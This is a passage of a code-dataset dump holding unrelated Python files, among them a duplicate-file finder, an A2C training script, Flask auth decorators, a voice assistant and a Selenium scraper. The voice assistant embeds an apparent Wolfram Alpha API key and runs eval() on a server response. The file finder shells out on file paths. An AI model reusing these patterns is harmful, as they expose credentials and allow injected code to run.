int(time.time())\n RQueueClient.getInstance().redis.set(cls.__KEY_PREFIX__ + room_id, json.dumps(room_dic), xx=True)\n return 1\n\n @classmethod\n def close_room(cls, room_id):\n RQueueClient.getInstance().redis.delete(cls.__KEY_PREFIX__ + room_id)\n","sub_path":"app_redis/room/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"493470610","text":"# dupFinder.py\nimport os\nimport sys\nimport hashlib\nimport argparse\nimport winsound\nimport platform\nimport subprocess\nfrom send2trash import send2trash\nimport tkinter as tk\nfrom tkinter import filedialog\n\nBLOCK_SIZE = 65536\nCHAR_KONST = 97\n\n# file extensions to skipp, no .\nSKIPP = [\"asd\", \"txt\", \"png\", \"jpg\"]\n\ncols, rows = os.get_terminal_size()\n\n# cli arguments\nargparser = argparse.ArgumentParser(description=\"Find doublicate files, give one or more paths as arguments \\nUsage: python dupPy.py -p folder1 folder2 <...>\")\nargparser.add_argument(\"-p\", \"--path\", type=str, nargs=\"+\", dest=\"paths\", help=\"give one or more paths to dirs \\nexample: -p \\\"I:\\\\example\\\\dir\\\\...\\\\...\\\"\")\nargparser.add_argument(\"-td\", \"--topdown\", action=\"store_true\", dest=\"topdown\", help=\"add '-r' to scan topdown\")\nargparser.add_argument(\"-fl\", \"--links\", action=\"store_true\", dest=\"followlinks\", help=\"add '-f' to follow symlinks\")\nargparser.add_argument(\"-pl\", \"--play\", action=\"store_true\", dest=\"player\", help=\"add '-pl' or '--play' flag to have play dialog\")\nargparser.add_argument(\"-rm\", \"--remove\", action=\"store_true\", dest=\"rem\", help=\"add '-r' or '--remove' flag to enable remove dialog\")\nargparser.add_argument(\"-s\", \"--strategy\", action=\"store_true\", dest=\"strat\", help=\"add '-s' or '--strategy' flag to ask for restart after removing a file\")\nargparser.add_argument(\"-sf\", \"--save-file\", action=\"store_true\", dest=\"tofile\", help=\"add '-sf' or '--save-file' flag to save to a file\")\nargparser.add_argument(\"-g\", \"--gui\", action=\"store_true\", dest=\"gui\", help=\"add '-g' or '--gui' flag to open chose dir dialog\")\nargparser.add_argument(\"-ar\", \"--auto-remove\", action=\"store_true\", dest=\"frem\", help=\"add flag to remove second dublicate atomatically\")\n\nargs, unknown = argparser.parse_known_args()\n\ndef gui_get_path():\n \"\"\"\n Gui to ask for target dir\n :return: selceted dir\n \"\"\"\n root = tk.Tk()\n root.withdraw()\n sdir = filedialog.askdirectory()\n # print(type(sdir))\n return sdir\n\n# play file with winsound\ndef play(file):\n \"\"\"\n play file with winsound or open it\n \"\"\"\n print(\"[>] playing: \\t{}...\".format(file))\n if platform.system() == \"Windows\":\n winsound.PlaySound(file, winsound.SND_FILENAME)\n else:\n sysPlay(file)\n\n# open file with shell\ndef sysPlay(file):\n print(\"[d] sysPlay: {}\".format(file))\n subprocess.call(\"\\\"{}\\\"\".format(file), shell=True)\n\ndef findDup(parentFolder):\n # Dups in format {hash:[names]}\n if args.topdown:\n print(\"[I] using topdown method\")\n t = True\n else:\n t = False\n if args.followlinks:\n print(\"[I] including sym-links\")\n f = True\n else:\n f = False\n # start scanning:\n dups = {}\n for dirName, subdirs, fileList in os.walk(parentFolder, topdown=t, followlinks=f):\n print(\"[i] Scanning: {}...\\r\".format(dirName), end=\"\")\n for filename in fileList:\n # skipp files\n # print(filename.split(\".\")[-1] in SKIPP)\n if filename.split(\".\")[-1] in SKIPP:\n continue\n # Get the path to the file\n path = os.path.join(dirName, filename)\n # Calculate hash\n file_hash = hashfile(path)\n # Add or append the file path\n if file_hash in dups:\n dups[file_hash].append(path)\n else:\n dups[file_hash] = [path]\n return dups\n\n# Joins two dictionaries\ndef joinDicts(dict1, dict2):\n for key in dict2.keys():\n if key in dict1:\n dict1[key] = dict1[key] + dict2[key]\n else:\n dict1[key] = dict2[key]\n \n# hash the file\ndef hashfile(path, blocksize = BLOCK_SIZE):\n afile = open(path, \"rb\")\n hasher = hashlib.md5()\n buf = afile.read(blocksize)\n while len(buf) > 0:\n hasher.update(buf)\n buf = afile.read(blocksize)\n afile.close()\n return hasher.hexdigest()\n \n# returns result array with pairs\ndef createResults(dict1):\n return list(filter(lambda x: len(x) > 1, dict1.values()))\n\ndef playResult(result):\n try:\n if len(result) > 1:\n p = True\n while p:\n a = ord(input(\"[?] wich one to play? (a/b/c/...) \")) - CHAR_KONST\n if a <= len(result) - 1 and a >= 0:\n if(result[a].endswith(\".wav\")):\n play(result[a])\n else:\n print(\"[e] the file is not playable...\")\n if(input(\"[?] do you want to open the file in the explorer? (y/n) \") == \"y\"):\n print(\"[i] opening in explorer...\")\n subprocess.Popen(\"explorer /select, \\\"{}\\\"\".format(result[a]))\n else:\n continue\n p = True\n else:\n p = False\n if(args.rem):\n r = ord(input(\"[?] wich one do you want to delete? (a/b/c/...) \")) - CHAR_KONST\n if r <= len(result) - 1 and r >= 0:\n if(os.path.isfile(result[r])):\n print(\"[i] removing: {}\".format(result[r]))\n send2trash(result[r])\n else:\n print(\"[e] {} ist not a valid file\".format(result[r]))\n if(args.strat):\n if(input(\"[?] do you want to restart? (y/n) \") == \"y\"):\n return True\n else:\n return False\n except TypeError:\n print(\"[E] TypeError...\")\n return True\n\ndef showResults(results):\n if len(results) > 0:\n c = 0\n print(\"\\n\\n[A] Duplicates Found: {}\".format(len(results)))\n print(\"[>] The following files are identical. The name could differ, but the content is identical\")\n for result in results:\n ch = 'a'\n print(\"_\" * cols)\n print(\"Nr: {}\\t{} duplicates...\".format(c, len(result)))\n for subresult in result:\n # if subresult == \"DS_Store\":\n print('{}) \\t{}' .format(ch ,subresult))\n ch = chr(ord(ch) + 1)\n print(\"_\" * cols)\n c += 1\n if args.frem and not args.player and not args.rem and not args.strat:\n print(\"[i] removing second...\")\n send2trash(result[-1])\n elif args.player:\n if(args.player):\n if playResult(result):\n return True\n else:\n continue\n else:\n print(\"[e] dont use '-ao' flag with '-pl' '-rm' and '-s' flags\")\n # continue\n else:\n print('[A] No duplicate files found.')\n return False\n\ndef toFile(results):\n \"\"\"\n writes results to a file\n \"\"\"\n c = 1\n with open(\"results.txt\", \"w\") as f:\n f.write(\"[>] We found {} doublicate files\\n\".format(len(results)))\n for result in results:\n ch = 'a'\n f.write(\"{}\\n\".format(\"_\" * cols))\n f.write(\"[i] Nr: {}\\t{} duplicates...\\n\".format(c, len(result)))\n for subresult in result:\n f.write(\"\\t{}) \\t{}\\n\" .format(ch ,subresult))\n ch = chr(ord(ch) + 1)\n f.write(\"{}\\n\".format(\"_\" * cols))\n c += 1\n\ndef main():\n folders = []\n if args.paths and not args.gui:\n print(\"[I] starting scan. quit with [ctrl + c]\")\n folders = args.paths\n elif args.gui and not args.paths:\n folders.append(gui_get_path())\n else:\n print(\"[E] plese use '-p' or '-g' not both at once\")\n folders = False\n if folders:\n e = True\n while e:\n try:\n dups = {}\n for i in folders:\n if os.path.exists(i):\n joinDicts(dups, findDup(i))\n else:\n print(\"[e] {} is not a valid path, please verify\".format(i))\n sys.exit()\n results = createResults(dups)\n if(args.tofile):\n toFile(results)\n e = showResults(results)\n except KeyboardInterrupt:\n print(\"\\n[e] KeyboardInterrupt exit programm...\")\n sys.exit(2)\n else:\n print(\"[e] no paths given...\")\n sys.exit(-1)\n \nif __name__ == \"__main__\":\n main()","sub_path":"dubPy lite.py","file_name":"dubPy lite.py","file_ext":"py","file_size_in_byte":8431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"547880747","text":"# testing ....\n\n\n'''\n智能体与环境交互的基本流程\n\n整体分为四部分: 参数读入与初始化, 环境交互, 记忆重构, 参数训练\n\n用a2c实现对比策略\n'''\n\nimport numpy as np \nfrom six.moves import range\nfrom six.moves import zip\nfrom absl import app\nfrom absl import flags\nfrom envs.tpycolab import tenv as pycolab_env\nimport GBMRagent\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow.keras.layers as layers\nimport gym\nimport logging\n\n'''\n超参数读入:环境相关,流程相关,智能体相关\n'''\nFLAGS = flags.FLAGS\n# 环境相关\n\n# flags.DEFINE_enum('pycolab_game', 'key_to_door',\n# ['key_to_door', 'active_visual_match'],\n# 'The name of the game in pycolab environment')\n# flags.DEFINE_integer('pycolab_num_apples', 10,\n# 'Number of apples to sample from the distractor grid.')\n# flags.DEFINE_float('pycolab_apple_reward_min', 1.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_float('pycolab_apple_reward_max', 10.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_boolean('pycolab_fix_apple_reward_in_episode', True,\n# 'Fix the sampled apple reward within an episode.')\n# flags.DEFINE_float('pycolab_final_reward', 10.,\n# 'Reward obtained at the last phase.')\n# flags.DEFINE_boolean('pycolab_crop', True,\n# 'Whether to crop observations or not.')\n\n# 尝试MsPacman\n# flags.DEFINE_enum('atari_game',\n# 'MsPacman-v0',\n# 'The name of the game in atari')\n\n# 流程相关\n\nflags.DEFINE_boolean('print_functionname', True,\n 'Whether to print_functionname.')\n\n# 智能体相关\n\nflags.DEFINE_integer('memory_size', 1000,'the number of nodes we are able to store in the graph.')\nflags.DEFINE_integer('memory_word_size', 32,'the lenth of words we are able to store in the graph.')\n\n\ndef main(_):\n if FLAGS.print_functionname == True:\n print(\"Hello world!\")\n\n # 环境初始化\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game,\n # 'num_apples': FLAGS.pycolab_num_apples,\n # 'apple_reward': [FLAGS.pycolab_apple_reward_min,\n # FLAGS.pycolab_apple_reward_max],\n # 'fix_apple_reward_in_episode': FLAGS.pycolab_fix_apple_reward_in_episode,\n # 'final_reward': FLAGS.pycolab_final_reward,\n # 'crop': FLAGS.pycolab_crop\n # }\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game\n # }\n # if FLAGS.print_functionname == True:\n # print(\"env_kwargs: \",env_kwargs)\n # env_builder = pycolab_env.PycolabEnvironment\n # env=env_builder(**env_kwargs) #以字典的形式传递参数,方便函数内部对参数的分别引用\n env = gym.make(\"PooyanDeterministic-v4\")\n # env = gym.make(\"CartPole-v1\")\n # env = gym.make(\"Alien-v0\")\n # ep_length = env.episode_length# 在key_to_door的环境中定义的\n ep_length = 1000\n #num_actions = env.num_actions\n num_actions = env.action_space.n\n observation = env.reset()\n dim_obs = observation.shape\n if FLAGS.print_functionname == True:\n print(\"ep_length\",ep_length,\"num_actions\",num_actions,\"dim_obs\",dim_obs)\n\n # 智能体初始化\n agent = GBMRagent.Agent(num_actions=num_actions,dim_obs=dim_obs,memory_size=FLAGS.memory_size,memory_word_size=FLAGS.memory_word_size)\n # agent.vae_initial()\n #agent.vaev_initial()\n\n ith_episode = 0 \n reward2step =[]\n ep_rews = [0.0]\n while True:\n # 开始新的episode\n ith_episode += 1\n if FLAGS.print_functionname == True:\n print(\"ith_episode\", ith_episode)\n \n observation = env.reset()\n print(\"obs shape\",observation.shape)\n observation = observation.reshape(1, observation.shape[1]*observation.shape[2]*observation.shape[0]).astype('float32') / 255\n #state = agent.obs2state(observation)\n observations =[]\n rewards =[]# 这个后来要用来算v值做监督信号\n epshistory = agent.EpsHistory_Initial()\n ep_rews.append(0.0)\n values =[]\n dones=[]\n actions=[]\n #states =[]\n # 环境交互\n for tt in range(ep_length):\n # if FLAGS.print_functionname == True:\n # print(\"jth_step\",tt)\n #action = agent.TakeRandomAction()\n #action, readinfo = agent.infer(state,epshistory)\n #action = agent.inferModelfree(state)\n #action,value=agent.a2cmodel.action_value(state)\n #action,value=agent.a2cmodel.action_value(observation)\n if np.random.uniform() < 0.7:\n action,value=agent.a2cmodel.action_value(observation)\n else:\n # choose random action\n action = np.random.choice(list(range(num_actions)))\n value = [0]\n observation_, reward,done,info = env.step(action)\n #print(\"info\",info)\n if info['ale.lives']<3:\n done = True\n reward = -50\n env.render()\n observation_ = observation_.reshape(1, observation_.shape[1]*observation_.shape[2]*observation_.shape[0]).astype('float32') / 255\n #state_ = agent.obs2state(observation_)\n #epshistory = agent.EpsHistory_add([state,action,reward,state_])\n observation= observation_\n #state= state_\n observations.append(observation)\n rewards.append(reward)\n values.append(value)\n dones.append(done)\n actions.append(action)\n #states.append(state)\n reward2step.append(reward)\n ep_rews[-1] += reward\n if done:\n break\n logging.info(\"Episode: %03d, Reward: %05d\" % (len(ep_rews)-1, ep_rews[-1]))\n # 记忆重构\n # agent.Memory_update(epshistory)\n # agent.Memory_abstract()\n # agent.Memory_reconstruct()\n # a2c 的训练\n #print(\"ep_rews\",ep_rews)#只有一个数\n rewards = np.stack(rewards)\n dones = np.stack(dones)\n values = np.stack(values)\n actions = np.stack(actions)\n #print(\"states\",states)\n #states = np.stack(states)\n values= np.squeeze(values)\n observations = np.stack(observations)\n observations = np.squeeze(observations)\n #states = np.squeeze(states)\n #print(\"rewards\",rewards,\"dons\",dones,\"values\",values,\"actions\",actions,\"states\",states)\n \n _, next_value = agent.a2cmodel.action_value(observation_)\n returns, advs = agent._returns_advantages(rewards, dones, values, next_value)\n acts_and_advs = np.concatenate([actions[:,None], advs[:,None]], axis=-1)\n #print(\"next_value\",next_value,\"returns\",returns,\"advs\",advs,\"advs,acts_and_advs\",acts_and_advs)\n a2closses = agent.a2cmodel.train_on_batch(observations, [acts_and_advs, returns])\n logging.info(\"[%d/%d] Losses: %s\" % (ith_episode+1, ith_episode, a2closses))\n # _, next_value = agent.a2cmodel.action_value(state_[None, :])\n # returns, advs = agent._returns_advantages(rewards, dones, values, next_value)\n # acts_and_advs = np.concatenate([actions[:, None], advs[:, None]], axis=-1)\n # a2closses = agent.a2cmodel.train_on_batch(states, [acts_and_advs, returns])\n # logging.debug(\"[%d/%d] Losses: %s\" % (ith_episode+1, ith_episode, a2closses))\n \n # 训练参数\n # observations = np.stack(observations)\n # rewards = np.stack(rewards)\n # print(\"obs shape\",observations.shape)\n # # input_train = observations.reshape(ep_length, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n # # rewards = rewards.reshape(ep_length,1).astype('float32') / 255 \n # input_train = observations.reshape(tt+1, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n # rewards = rewards.reshape(tt+1,1).astype('float32') / 255 \n # agent.vaev_train(input_train,rewards,epochs =2, batch_size =64)\n # agent.train_agg()\n #if len(reward2step)%10==0:\n print(\"write current data\",len(reward2step))\n np.save(\"rewstep.npy\",reward2step)\n \n\nif __name__ == '__main__':\n with tf.device('/gpu:0'):\n app.run(main)\n","sub_path":"Base/run_MsPacman_a2c_nostate.py","file_name":"run_MsPacman_a2c_nostate.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91183741","text":"from PyQt5.QtWidgets import QComboBox\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import QVariant\nfrom PyQt5.QtWidgets import QListWidgetItem\n\nclass ProcedureComboBox(QComboBox):\n def __init__(self, parent):\n\n QComboBox.__init__(self, parent)\n\n\n self.activated.connect(self.itemActivated)\n\n def init(self, procedureService, measurementService, uiMessenger):\n\n self.procedureService = procedureService\n self.measurementService = measurementService\n self.uiMessenger = uiMessenger\n\n for procedure in self.procedureService.procedures:\n self.addItem(procedure.name, procedure)\n\n\n def itemActivated(self, id):\n procedure = self.currentData()\n self.uiMessenger.parameterListActivateProcedure.emit(procedure)\n self.measurementService.labelPlot.emit(procedure.getPlotSetup())","sub_path":"Controllers/ProcedureComboBox.py","file_name":"ProcedureComboBox.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"361102515","text":"\ndef solution(id_list, k):\n customers = {}\n\n for cus in id_list:\n cus = set(cus.split())\n\n for c in cus:\n if c not in customers.keys():\n customers[c] = 1\n\n elif customers[c] < k:\n customers[c] += 1\n return sum(customers.values())\n\n\nif __name__ == \"__main__\":\n print(solution([\"A B C D\", \"A D\", \"A B D\", \"B D\"], 2))\n","sub_path":"naver-hackday-2020/02.py","file_name":"02.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"564847484","text":"import sys, os\nfrom cx_Freeze import setup, Executable\n\ndata_dirs = ['KEY_BNC', 'Data']\n\n# Dependencies are automatically detected, but it might need fine tuning.\nbuild_exe_options = {\"packages\": [\"os\"],\n \"excludes\": ['tk', '_tkagg', '_gtkagg', '_gtk', 'tcl'],\n \"include_files\": [os.path.join(data_dirs[0], data_dirs[1])]}\n\n# GUI applications require a different base on Windows (the default is for a\n# console application).\nbase = None\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup( name = \"KEY_BNC\",\n version = \"0.1\",\n description = \"My GUI application!\",\n options = {\"build_exe\": build_exe_options},\n executables = [Executable(\"KEY_BNC_app.py\", base=base)])\n","sub_path":"setup_win.py","file_name":"setup_win.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"279916763","text":"\n\nfrom flask import request\n\n#from ecrdb import *\nimport ecrdb\n\nfrom error_response import ErrorResponse\n\nfrom http import HTTPStatus\n\n\ndef login_required(func):\n def wrapper2(self, **kwargs):\n authenticated = request.environ['authenticated']\n if not authenticated:\n raise ErrorResponse('Not authenticated', status_code=HTTPStatus.UNAUTHORIZED)\n\n #if len(args) == 0:\n # return func(self)\n \n\n return func(self, **kwargs)\n \n return wrapper2\n\n\n\ndef has_permission(*permissions):\n def real_decorator(func):\n def wrapper(self, app_id):\n \n\n authenticated = request.environ['authenticated']\n\n ecr_db = ecrdb.EcrDB()\n\n\n if not authenticated:\n if not (ecr_db.hasPermission(app_id, \"GROUP\", \"AllUsers\" , permissions)):\n raise ErrorResponse(f'Not authorized.', status_code=HTTPStatus.UNAUTHORIZED)\n\n requestUser = request.environ.get('user', \"\")\n isAdmin = request.environ.get('admin', False)\n\n\n if (isAdmin or ecr_db.hasPermission(app_id, \"USER\", requestUser ,permissions)):\n return func(self, app_id)\n\n raise ErrorResponse(f'Not authorized.', status_code=HTTPStatus.UNAUTHORIZED)\n\n\n \n \n return wrapper\n return real_decorator\n\n\n","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"472114566","text":"from __init__ import *\r\n\r\n\r\ndef wolfquery(question):\r\n if question.lower().startswith('wolfram'):\r\n question = question[8:]\r\n client = wolframalpha.Client('R33RAT-7QTK4AL8LL')\r\n res = client.query(question)\r\n try:\r\n return next(res.results).text\r\n except StopIteration:\r\n try:\r\n answers = ' '.join([each_answer.text for each_answer in res.pods if each_answer])\r\n except TypeError:\r\n answers = None\r\n if answers:\r\n return answers\r\n return \"Sorry, Wolfram doesn't know the answer.\"\r\n\r\n\r\ndef say(message, title='Speak', speech_system='google', say=True, lang='en'):\r\n if speech_system == 'google':\r\n # Create the MP3 file which will speak the text\r\n folder = ''\r\n if '\\\\' in title:\r\n folder = '\\\\'.join(title.split('\\\\')[:-1])\r\n title += '.mp3'\r\n tts = gTTS(message, lang=lang)\r\n path = home+'\\\\'+title\r\n folder_path = home + \"\\\\\" + folder\r\n if not os.path.exists(folder_path):\r\n os.makedirs(folder_path)\r\n tts.save(path)\r\n if say:\r\n call(\"start /MIN {}\".format(home+'\\\\'+title), shell=True)\r\n else:\r\n # Create the Visual Basic code which will speak the text\r\n with open(title + '.vbs', 'w') as file:\r\n file.write(\r\n \"\"\"\r\n speaks=\"{}\"\r\n Dim speaks, speech\r\n Set speech=CreateObject(\"sapi.spvoice\")\r\n speech.Speak speaks\r\n \"\"\"\r\n .format(\r\n str(message).replace('\"', '').replace('\\n', '')))\r\n # Execute the file\r\n call(['cscript.exe', title + '.vbs'])\r\n\r\n\r\ndef ask_google():\r\n print(\"Please speak now\")\r\n with m as source:\r\n audio = r.listen(source)\r\n print(\"Processing audio\")\r\n try:\r\n return r.recognize_google(audio)\r\n except sr.UnknownValueError: # speech is unintelligible\r\n return \"GSR Could not understand audio\"\r\n except sr.RequestError:\r\n return \"Could not request results from Google Speech Recognition service\"\r\n\r\n\r\ndef query(input_type):\r\n resampler = apiai.Resampler(source_samplerate=RATE)\r\n request = None\r\n \r\n vad = apiai.VAD()\r\n\r\n if input_type == 'local':\r\n print(\"Local Speech Recognition\")\r\n request = ai.voice_request()\r\n \r\n def callback(in_data, frame_count, time_info, status):\r\n frames, data = resampler.resample(in_data, frame_count)\r\n if show_decibels:\r\n decibel = 20 * log(audioop.rms(data, 2)+1, 10)\r\n print(decibel)\r\n state = vad.processFrame(frames)\r\n request.send(data)\r\n\r\n if state == 1:\r\n return in_data, pyaudio.paContinue\r\n else:\r\n return in_data, pyaudio.paComplete\r\n\r\n p = pyaudio.PyAudio()\r\n \r\n stream = p.open(format=FORMAT,\r\n channels=CHANNELS,\r\n rate=RATE,\r\n input=True,\r\n output=False,\r\n frames_per_buffer=CHUNK,\r\n stream_callback=callback)\r\n\r\n stream.start_stream()\r\n \r\n print (\"Speak!\")\r\n \r\n try:\r\n while stream.is_active():\r\n time.sleep(0.1)\r\n except Exception as e:\r\n raise e\r\n except KeyboardInterrupt:\r\n pass\r\n \r\n stream.stop_stream()\r\n stream.close()\r\n p.terminate()\r\n elif input_type == 'google':\r\n print(\"Google's speech recognition\")\r\n request = ai.text_request()\r\n request.query = ask_google()\r\n else:\r\n request = ai.text_request()\r\n try:\r\n request.query = input(\"Input your query: \")\r\n except KeyboardInterrupt:\r\n raise SystemExit\r\n print (\"Wait for response...\")\r\n response = request.getresponse()\r\n response = response.read()\r\n\r\n try:\r\n response = eval(response.decode('UTF-8'))\r\n except NameError:\r\n response = {'result':{'fulfillment':{'speech':\" \"}, 'action': \"None\", 'resolvedQuery': \"UNKNOWN\"}}\r\n return response\r\n\r\n\r\ndef listen(input_type = 'google'):\r\n action = \"None\"\r\n response = query(input_type)['result']\r\n reply = response['fulfillment']['speech']\r\n question = response['resolvedQuery']\r\n print(\"You said: \" + question)\r\n action = response['action']\r\n \r\n return action, question, reply\r\n\r\n\r\ndef wolf(question):\r\n answer = wolfquery(question)\r\n answer = answer.replace('\\n', '; ').replace('~~', ' or about ')\r\n try:\r\n answer = answer[answer.index('=')+1:]\r\n except ValueError:\r\n pass\r\n return answer\r\n\r\n\r\ndef causality(action):\r\n return {\r\n \"manage.app_close\": manage.app_close,\r\n \"input.unknown\": wolf,\r\n \"wisdom.unknown\": wolf,\r\n }.get(action, wolf)\r\n","sub_path":"Py/Py3/Functional/Assistant/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"76187236","text":"import re\nimport urllib.request\nfrom selenium.common import exceptions\nfrom .. import common\nfrom .. import db\nfrom .. import data\n\n\nclass Mgs:\n\n def __init__(self):\n self.main_url = 'https://www.mgstage.com/product/product_detail/'\n self.opener = urllib.request.build_opener()\n self.opener.addheaders = [('User-Agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n\n self.env = common.Environment()\n self.driver = self.env.get_driver()\n self.import_dao = db.import_dao.ImportDao()\n\n def __get_info_from_chrome(self, product_number, url: str = ''):\n\n if len(url) > 0:\n self.driver.get(url)\n else:\n self.driver.get(self.main_url + product_number + '/')\n\n detail = ''\n sell_date = ''\n h2 = None\n try:\n h2 = self.driver.find_element_by_tag_name('h2')\n except exceptions.NoSuchElementException:\n print('h2 tag not found exceptions.NoSuchElementException')\n\n if h2 is None:\n print('h2 tag none')\n return None\n\n if h2.text == '年齢認証':\n over18yes = self.driver.find_element_by_tag_name('li')\n # over18yes = self.driver.find_element_by_id('id')\n over18yes.click()\n\n h1 = None\n try:\n h1 = self.driver.find_element_by_css_selector('.tag')\n except exceptions.NoSuchElementException:\n print('h1 tag not found exceptions.NoSuchElementException')\n\n site_data = data.SiteData()\n if h1 != None:\n site_data.title = h1.text\n\n # 存在しない品番の場合は、forをそのままスルー、空文字でリターンされる\n for tr_tag in self.driver.find_elements_by_tag_name('tr'):\n\n try:\n th_tag = tr_tag.find_element_by_tag_name('th')\n except:\n th_tag = None\n\n if not th_tag:\n continue\n\n if re.search('出演', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.actress = td_tag.text\n # detail += td_tag.text + '、'\n if re.search('メーカー', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.maker = td_tag.text\n # detail += td_tag.text + '、'\n if re.search('収録時間', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.duration = td_tag.text\n if re.search('品番', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.productNumber = td_tag.text\n if re.search('配信開始日', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.streamDate = td_tag.text\n if re.search('商品発売日', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.sellDate = td_tag.text\n if re.search('シリーズ', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.series = td_tag.text\n if re.search('レーベル', th_tag.text):\n td_tag = tr_tag.find_element_by_tag_name('td')\n site_data.label = td_tag.text\n\n # detail += title\n\n return site_data\n\n def get_info(self, product_number, url: str = ''):\n\n return self.__get_info_from_chrome(product_number, url)\n\n def exist_product_number(self, product_number):\n\n self.driver.get(self.main_url + product_number + '/')\n\n h2 = None\n try:\n h2 = self.driver.find_element_by_tag_name('h2')\n except exceptions.NoSuchElementException:\n print('h2 tag not found exceptions.NoSuchElementException')\n\n if h2 is None:\n print('h2 tag none')\n return False\n\n if h2.text == '年齢認証':\n over18yes = self.driver.find_element_by_tag_name('li')\n # over18yes = self.driver.find_element_by_id('id')\n over18yes.click()\n\n try:\n h1 = self.driver.find_element_by_css_selector('.tag')\n except exceptions.NoSuchElementException:\n print('h1 tag not found exceptions.NoSuchElementException')\n return False\n\n # 存在しない品番の場合は、forをそのままスルー、空文字でリターンされる\n for tr_tag in self.driver.find_elements_by_tag_name('tr'):\n return True\n\n return False\n\n def test_execute(self):\n\n imports = self.import_dao.get_all()\n if len(imports) > 0:\n for one_data in imports:\n detail, sell_date = self.get_info(one_data.productNumber)\n if len(sell_date) > 0:\n print(one_data.copy_text)\n print(detail)\n print('')\n self.import_dao.update_detail_and_sell_date(detail, sell_date, one_data.id)\n\n\nif __name__ == '__main__':\n\n mgs = Mgs()\n # detail, sell_date = mgs.get_info('277DCV-093')\n detail, sell_date = mgs.test_execute()\n # print(' [' + str(sell_date) + '] ' + detail)\n\n","sub_path":"src/site/mgs.py","file_name":"mgs.py","file_ext":"py","file_size_in_byte":5368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184947989","text":"from tkinter import *\n\nraiz= Tk()\nraiz.title(\"VENTANA DE PRUEBA\")\nraiz.resizable(1,1)\n#raiz.geometry(\"600x300\")\nraiz.config(bg= \"green\") #bg = background\n# Aqui se crea el Frame\nframePrincipal= Frame(raiz)\nframePrincipal.pack(side= \"left\", anchor= \"s\") #para ubicar el frame en alguna posicion (derecha,izquierda)\nframePrincipal.config(width= \"600\", height= \"350\")\nframePrincipal.config(bg= \"red\")\nframePrincipal.config(bd= 20) #bd= border\nframePrincipal.config(relief = \"groove\")\nframePrincipal.config(cursor= \"hand2\")\n\n#Aqui se introducen label, cuadro txt\n\nlabelMenu = Label(framePrincipal,text= \"Menú Principal\",fg=\"blue\",font=(18)).grid(row= 0, column= 2)\nlabelAdminFrase = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 3, column= 0,sticky= \"e\",padx=10,pady=10)\n#txtAdminFrase = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 3, column= 1) #fg:color letra\nlabelAdminJuego = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 3, column= 2,sticky= \"e\",padx=10,pady=10)\n#txtAdminJuego = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 3, column= 3,padx=10,pady=10) #fg:color letra\nlabelAdminJugadores = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 4, column= 0,sticky= \"e\",padx=10,pady=10)\n#txtAdminJugadores = Entry(framePrincipal,fg=\"black\",font=(2)).grid(row= 4, column= 1) #fg:color letra\nlabelsalir = Label(framePrincipal,text= \"Boton-->\",fg=\"black\",font=(12)).grid(row= 4, column= 2,sticky= \"e\",padx=10,pady=10)\n#txtSalir = Entry(framePrincipal,fg=\"black\",font=(12)).grid(row= 4, column= 3,padx=10,pady=10) #fg:color letra\n\n#Aquis se agregan botones\nbotonAdminFrase = Button(framePrincipal,text= \"Admin Frases\").grid(row= 3, column= 1)\nbotonAdminJuego = Button(framePrincipal,text= \"Admin Juego\").grid(row= 3, column= 3,padx=10,pady=10)\nbotonAdminJugadores = Button(framePrincipal,text= \"Admin Jugadores\").grid(row= 4, column= 1)\nbotonsalir = Button(framePrincipal,text= \"Salir\").grid(row= 4, column= 3,padx=10,pady=10)\n\n\nraiz.mainloop()","sub_path":"VistasAhorcado/pruebaInterfaz.py","file_name":"pruebaInterfaz.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"523689710","text":"import actionlib\nimport rospy\n\nfrom 